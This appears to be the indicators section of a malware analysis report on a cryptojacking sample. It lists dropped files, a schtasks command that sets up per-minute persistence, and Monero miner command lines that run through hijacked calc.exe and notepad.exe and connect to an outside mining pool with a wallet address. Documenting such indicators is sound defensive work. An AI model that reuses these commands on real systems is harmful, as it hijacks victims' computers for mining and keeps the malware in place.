Technical Information
- <SYSTEM32>\calc.exe
- <SYSTEM32>\calc.exe
- <SYSTEM32>\notepad.exe
- %APPDATA%\atl110\WSReset.exe
- %TEMP%\aut1.tmp
- %TEMP%\wnwddsx
- %TEMP%\LZMA.DLL
- %TEMP%\aut1.tmp
- %TEMP%\wnwddsx
- '<Full path to file>'
- '<SYSTEM32>\schtasks.exe' /create /tn tzsync /tr "%APPDATA%\atl110\WSReset.exe" /sc minute /mo 1 /F
- '<SYSTEM32>\calc.exe' -o pooleu.xmrminingpool.net:2222 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQtz7XNvpsygAzF9g1Y -p NativeTestCpu -k --max-cpu-usage=75
- '<SYSTEM32>\notepad.exe' -o pooleu.xmrminingpool.net:2222 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQtz7XNvpsygAzF9g1Y -p NativeTestCpuINACTIVO -k --max-cpu-usage=50
- '<SYSTEM32>\calc.exe' -o pooleu.xmrminingpool.net:2222 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQtz7XNvpsygAzF9g1Y -p NativeTestCpu -k --max-cpu-usage=50